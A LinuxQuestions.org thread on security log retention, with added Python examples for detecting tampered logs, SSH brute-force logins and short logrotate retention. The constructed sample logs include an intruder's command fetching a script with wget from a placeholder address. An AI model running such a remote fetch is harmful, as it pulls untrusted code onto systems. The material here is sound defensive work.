LinuxQuestions.org > Forums > Linux Forums > Linux - Security
Old 09-03-2014, 03:10 AM   #1
pranks
LQ Newbie

Registered: Jun 2010
Posts: 7
Logs to be maintained keeping security in mind


Hello,

What kind of logs do we need to maintain keeping security in mind, or which can be useful for investigation agencies? As of now I download the following:


1) Website Access Log
/usr/local/apache/logs/access_log
/usr/local/apache/domlogs

2) FTP Access Log
/var/log/messages

3) MySQL Access Log
/var/lib/mysql, called hostname.log and hostname-slow.log, where hostname is the short hostname of the machine.

4) Cpanel Access Log
/usr/local/cpanel/logs/access_log

Thanks
Old 09-03-2014, 04:41 AM   #2
zhjim
Senior Member

Registered: Oct 2004
Distribution: Debian Squeeze x86_64
Posts: 1,748
Blog Entries: 11
Every log file should be kept when it comes to security. One log file might not have all the information you need, or you might miss out on side steps that have been done.

Another thing, security-wise, is not to download the log files but to have them sent to a logging server right away. An intruder will most likely alter the log files, so downloads would not show any evidence. If you have the log files on another server you can compare them and see if they differ, if you need to investigate.
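The comparison zhjim describes, with the forwarded copy on the log server as the trusted side and the downloaded file as the suspect side, as an added example that is not part of the original post and not any poster's code. It assumes classic syslog lines (timestamp, host, program, message) and works on two constructed sample logs embedded inline; the host name web1, the addresses and the commands are made up.

```python
"""Compare a host's local log with the copy that rsyslog forwarded to the
central log server, and report lines that were removed or rewritten on the
host.  Added example for this thread, not code from the original post; both
logs below are constructed samples (host name, addresses and commands are
made up) so the script runs offline.
"""
from difflib import SequenceMatcher

# Constructed sample: what the log server received from host web1.
REMOTE_LOG = """\
Sep  3 02:10:01 web1 sshd[2311]: Accepted publickey for deploy from 10.0.0.5 port 51522 ssh2
Sep  3 02:14:37 web1 sshd[2398]: Failed password for root from 198.51.100.23 port 40021 ssh2
Sep  3 02:14:39 web1 sshd[2398]: Failed password for root from 198.51.100.23 port 40021 ssh2
Sep  3 02:14:42 web1 sshd[2398]: Accepted password for root from 198.51.100.23 port 40021 ssh2
Sep  3 02:15:10 web1 sudo:     root : TTY=pts/1 ; PWD=/root ; COMMAND=/usr/bin/wget http://198.51.100.23/x.sh
Sep  3 02:16:00 web1 cron[2500]: (root) CMD (/usr/lib/sa/sa1 1 1)
"""

# Constructed sample: the same file as later downloaded from web1.  The
# intruder deleted the lines recording their login and rewrote the sudo line.
LOCAL_LOG = """\
Sep  3 02:10:01 web1 sshd[2311]: Accepted publickey for deploy from 10.0.0.5 port 51522 ssh2
Sep  3 02:15:10 web1 sudo:     root : TTY=pts/1 ; PWD=/root ; COMMAND=/usr/bin/yum update
Sep  3 02:16:00 web1 cron[2500]: (root) CMD (/usr/lib/sa/sa1 1 1)
"""


def _key(line):
    """(timestamp, 'host program[pid]') of a classic syslog line, used to pair
    a rewritten line with the original it replaced; the timestamp is 15 chars."""
    return (line[:15], line[16:].split(":", 1)[0])


def compare_logs(remote_text, local_text):
    """Diff the trusted (forwarded) copy against the suspect (local) copy.

    missing       lines the server holds that are gone from the host
    altered       (remote_line, local_line) pairs: same timestamp and program,
                  different message
    extra         lines only present locally (after forwarding stopped, or planted)
    rotated_away  leading lines logrotate legitimately moved out of the local
                  file (the local copy is a suffix of the remote one)
    """
    remote, local = remote_text.splitlines(), local_text.splitlines()
    result = {"missing": [], "altered": [], "extra": [], "rotated_away": 0}
    if local and len(local) <= len(remote) and remote[len(remote) - len(local):] == local:
        result["rotated_away"] = len(remote) - len(local)   # normal rotation, nothing lost
        return result
    for tag, r1, r2, l1, l2 in SequenceMatcher(None, remote, local, autojunk=False).get_opcodes():
        if tag == "delete":
            result["missing"].extend(remote[r1:r2])
        elif tag == "insert":
            result["extra"].extend(local[l1:l2])
        elif tag == "replace":
            # pair by timestamp/program; whatever is left over is missing or extra
            pending = list(remote[r1:r2])
            for loc in local[l1:l2]:
                match = next((r for r in pending if _key(r) == _key(loc)), None)
                if match is None:
                    result["extra"].append(loc)
                else:
                    pending.remove(match)
                    result["altered"].append((match, loc))
            result["missing"].extend(pending)
    return result


def report(result):
    """Non-empty missing/altered means the downloaded file is not usable evidence."""
    out = ["MISSING on host : " + l for l in result["missing"]]
    for old, new in result["altered"]:
        out += ["ALTERED on host : " + old, "          now   : " + new]
    out += ["EXTRA on host   : " + l for l in result["extra"]]
    if result["rotated_away"]:
        out.append("%d older lines rotated away locally (normal)" % result["rotated_away"])
    return "\n".join(out) or "local copy matches the log server"


if __name__ == "__main__":
    print(report(compare_logs(REMOTE_LOG, LOCAL_LOG)))
```

In practice the two inputs are the file pulled from the suspect host and the per-host file the log server wrote for it. A clean match only proves as much as the forwarding did: if the forwarder was stopped before the intruder arrived, both copies agree and both are incomplete, which is the reason to forward immediately rather than fetch logs afterwards.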
 
Old 09-03-2014, 08:14 PM   #3
solarisguy
Member

Registered: Aug 2010
Location: Seattle
Distribution: CentOS, RHEL, Oracle Enterprise Linux, Solaris, BSD
Posts: 64
Centralized logging is the best route here, with extremely limited access to the logging server.

One great way to do this is with rsyslog. It can take UDP 514 (standard syslog) or TCP 514, which ensures delivery. UDP has no retry mechanism; it's fire and forget. TCP will retransmit if there is an error on the wire.

One file you should always keep an eye on is /var/log/secure as well.

OSSEC is also a great tool to install on your system. It will watch for any suspicious activity and alert administrators when it is detected. I work for a very large telecom and we have this type of alarming in place. We know when a security event occurs even before the security NOC knows and have taken action to prevent further intrusions in the past.
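Keeping an eye on /var/log/secure, as solarisguy suggests, comes down to a few rules run over sshd's lines. Below is an added example, not from the post and not OSSEC's own rule set, that flags a burst of failed logins from one address and, more importantly, a successful login that follows such a burst from the same address. The log lines are constructed samples; the year (classic syslog timestamps carry none), the three-failure threshold and the ten-minute window are assumptions.

```python
"""Flag SSH brute-force bursts in /var/log/secure and, worse, a successful
login that follows such a burst from the same address.

Added example for this thread: not code from the original post and not
OSSEC's rule set.  SAMPLE_SECURE is constructed; the year (syslog timestamps
carry none), the 3-failure threshold and the 10-minute window are assumptions.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

ASSUMED_YEAR = 2014

SAMPLE_SECURE = """\
Sep  3 02:10:01 web1 sshd[2311]: Accepted publickey for deploy from 10.0.0.5 port 51522 ssh2
Sep  3 02:14:37 web1 sshd[2398]: Failed password for root from 198.51.100.23 port 40021 ssh2
Sep  3 02:14:39 web1 sshd[2398]: Failed password for root from 198.51.100.23 port 40021 ssh2
Sep  3 02:14:41 web1 sshd[2402]: Failed password for invalid user admin from 198.51.100.23 port 40022 ssh2
Sep  3 02:14:44 web1 sshd[2405]: Failed password for root from 198.51.100.23 port 40023 ssh2
Sep  3 02:14:50 web1 sshd[2409]: Accepted password for root from 198.51.100.23 port 40024 ssh2
Sep  3 02:20:12 web1 sshd[2477]: Failed password for invalid user test from 203.0.113.9 port 3310 ssh2
Sep  3 02:21:00 web1 sudo:     deploy : TTY=pts/0 ; PWD=/home/deploy ; COMMAND=/bin/systemctl restart httpd
"""

# Accepted/Failed lines as OpenSSH writes them; "invalid user" is optional.
SSHD_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} [ \d]\d \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\S+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2"
)


def parse_sshd_line(line):
    """Dict for an sshd Accepted/Failed line, None for everything else."""
    m = SSHD_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%b %d %H:%M:%S").replace(year=ASSUMED_YEAR)
    return ev


def detect_ssh_attacks(lines, threshold=3, window=timedelta(minutes=10)):
    """Sliding-window detector.  Alerts:
      bruteforce              `threshold` failures from one IP inside `window`,
                              reported once per burst
      success_after_failures  Accepted login from an IP still over the threshold;
                              treat the account and host as compromised
    """
    failures = defaultdict(deque)   # ip -> timestamps of failures in the window
    warned = set()                  # ips whose current burst was already reported
    alerts = []
    for line in lines:
        ev = parse_sshd_line(line)
        if ev is None:
            continue
        q = failures[ev["ip"]]
        while q and ev["ts"] - q[0] > window:
            q.popleft()                         # failure aged out of the window
        if not q:
            warned.discard(ev["ip"])            # burst over; a new one may alert again
        if ev["result"] == "Failed":
            q.append(ev["ts"])
            if len(q) >= threshold and ev["ip"] not in warned:
                warned.add(ev["ip"])
                alerts.append({"type": "bruteforce", "ip": ev["ip"],
                               "count": len(q), "ts": ev["ts"]})
        elif len(q) >= threshold:
            alerts.append({"type": "success_after_failures", "ip": ev["ip"],
                           "user": ev["user"], "method": ev["method"],
                           "failures": len(q), "ts": ev["ts"]})
    return alerts


if __name__ == "__main__":
    for a in detect_ssh_attacks(SAMPLE_SECURE.splitlines()):
        print("%s %-22s %s" % (a["ts"].strftime("%H:%M:%S"), a["type"],
                               {k: v for k, v in a.items() if k not in ("ts", "type")}))
```

Run against the copy on the log server rather than the host's own file, for the reason zhjim gives: the host's /var/log/secure is the first thing an intruder who got root will edit. The second alert type is the one worth paging on; a burst of failures alone is background noise on any Internet-facing sshd.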
Old 09-04-2014, 02:06 AM   #4
unSpawn
Moderator

Registered: May 2001
Posts: 29,409
Blog Entries: 55
Talking about logs indeed is one thing. Too often I still see people who don't alter logrotate defaults, meaning that given an incident a couple of months ago, anything of use will already have been rotated away and gone.

Secondly, it still needs emphasizing that security is not a one-off but (after the initial hardening process) a continuous process of auditing and adjusting. This means, for example, that installation of a service must be preceded by informing yourself about the (in)security of the software and the ways in which to mitigate risks, and be followed by proper configuration, testing and regular log checks (Logwatch?).

Also note that one shouldn't rely on one auditing tool alone. For example, the rootkit component of OSSEC HIDS hasn't as a whole been updated much since the product was bought by a large commercial vendor (and if you only want the file integrity checking part you could well use Samhain or even AIDE or tripwire).

Finally, as the OP seems to be using Cpanel, he should be especially aware of the pitfalls of using such products.
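unSpawn's logrotate point can be checked mechanically: retention is the rotate count times the rotation interval, capped by maxage, so a stock "weekly, rotate 4" keeps four weeks and nothing more. The following added example (not from the post, not any poster's code) parses a logrotate configuration and flags every stanza that would discard logs before a chosen retention period. The configuration is a constructed sample modelled on a default /etc/logrotate.conf, the 90-day policy is an assumption, months are counted as 30 days, and include directives are not followed.

```python
"""Audit how long logrotate keeps each log before it is gone for good.

Added example for this thread, not code from the original post.  SAMPLE_CONF
is a constructed sample modelled on a stock logrotate.conf, the 90-day policy
is an assumption, and `include` directives are not followed.
"""
INTERVAL_DAYS = {"hourly": 1 / 24, "daily": 1, "weekly": 7, "monthly": 30, "yearly": 365}
SCRIPT_DIRECTIVES = {"prerotate", "postrotate", "firstaction", "lastaction", "preremove"}

SAMPLE_CONF = """\
weekly
rotate 4
create

/var/log/wtmp {
    monthly
    create 0664 root utmp
    rotate 1
}

/var/log/secure /var/log/messages {
    missingok
    sharedscripts
    postrotate
        /bin/kill -HUP `cat /var/run/syslogd.pid 2> /dev/null` 2> /dev/null || true
    endscript
}

/usr/local/apache/logs/access_log {
    daily
    rotate 7
}

/usr/local/apache/domlogs/* {
    weekly
    rotate 52
    maxage 180
}
"""


def parse_logrotate(text):
    """Return (global_directives, [(paths, directives), ...]); values stay
    strings, script bodies between postrotate/endscript are skipped."""
    defaults, stanzas, paths, current, in_script = {}, [], [], None, False
    for raw in text.splitlines():
        line = raw.strip()
        if in_script:
            in_script = line != "endscript"
            continue
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        if current is None and (line.startswith("/") or line.endswith("{")):
            paths += line.rstrip("{").split()       # a header may span several lines
            if line.endswith("{"):
                current, paths = (paths, {}), []
            continue
        if line == "}":
            stanzas.append(current)
            current = None
            continue
        key, _, value = line.partition(" ")
        if key in SCRIPT_DIRECTIVES:
            in_script = True
            continue
        (defaults if current is None else current[1])[key] = value.strip()
    return defaults, stanzas


def _interval_days(directives):
    return next((d for name, d in INTERVAL_DAYS.items() if name in directives), None)


def retention_days(directives, defaults):
    """rotate count x interval, capped by maxage; None if rotation is size-driven
    or unspecified (check those by hand).  A month is counted as 30 days."""
    interval = _interval_days(directives) or _interval_days(defaults)
    if interval is None:
        return None
    # logrotate's own default is rotate 0, which deletes the old log outright
    count = int(directives.get("rotate", defaults.get("rotate", "0")))
    days = count * interval
    maxage = directives.get("maxage", defaults.get("maxage"))
    return min(days, int(maxage)) if maxage is not None else days


def audit_logrotate(text, policy_days=90):
    """One row per stanza; unknown retention counts as failing the policy."""
    defaults, stanzas = parse_logrotate(text)
    return [{"paths": paths, "retention_days": d, "ok": d is not None and d >= policy_days}
            for paths, directives in stanzas
            for d in [retention_days(directives, defaults)]]


if __name__ == "__main__":
    for row in audit_logrotate(SAMPLE_CONF):
        print("%-5s %4s days  %s" % ("ok" if row["ok"] else "SHORT",
                                     row["retention_days"], " ".join(row["paths"])))
```

On the sample, /var/log/secure and /var/log/messages inherit the global weekly/rotate 4 and survive 28 days, the Apache access_log seven, and only the domlogs stanza (capped by its maxage) meets a 90-day policy. The fix is cheap: raise rotate (or set maxage) for the files an investigation would need, and point logrotate at a separate partition if disk is the worry. Retention on the central log server should be set independently, since that copy is the one that survives a compromised host.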
Old 09-06-2014, 02:01 AM   #5
pranks
LQ Newbie

Registered: Jun 2010
Posts: 7
Original Poster
Thanks everyone